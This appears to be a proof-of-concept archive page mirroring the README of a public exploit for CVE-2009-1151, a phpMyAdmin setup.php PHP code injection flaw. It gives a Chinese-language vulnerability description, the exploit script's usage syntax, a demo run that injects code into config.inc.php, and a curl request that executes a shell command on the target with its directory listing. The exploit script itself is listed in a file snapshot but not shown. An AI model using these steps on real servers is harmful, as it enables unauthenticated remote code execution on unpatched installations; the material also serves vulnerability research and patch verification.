Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2009-1151 PoC — phpMyAdmin setup.php脚本PHP代码注入漏洞

Source
https://github.com/pagvac/pocs
Associated Vulnerability
Title:phpMyAdmin setup.php脚本PHP代码注入漏洞 (CVE-2009-1151)
Description:phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
Description
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)
Readme
# minervais.com.phpMyAdminRCE.sh
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE POC. This was the first publicly-released exploit for CVE-2009-1151.

## Syntax
```
$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/
```

## Demo
```
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign_goes_here>gmail.com
```

## Post-injection RCE:
```
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr-xr-x   3 root   root  4096 May  6 10:01 boot
lrwxrwxrwx   1 root   root    11 Oct 12  2008 cdrom -> media/cdrom
drwxr-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr-xr-x   2 root   root  4096 Jul  2  2008 initrd
_[partial output removed for brevity reasons]_
```
File Snapshot

 [4.0K]  /data/pocs/1169b7e2a1cfd6dfa6ca8256813f0a49c74bf9c7
├── [ 34K]  calc.xls
├── [4.2K]  minervais.com.phpMyAdminRCE.sh
└── [1.5K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.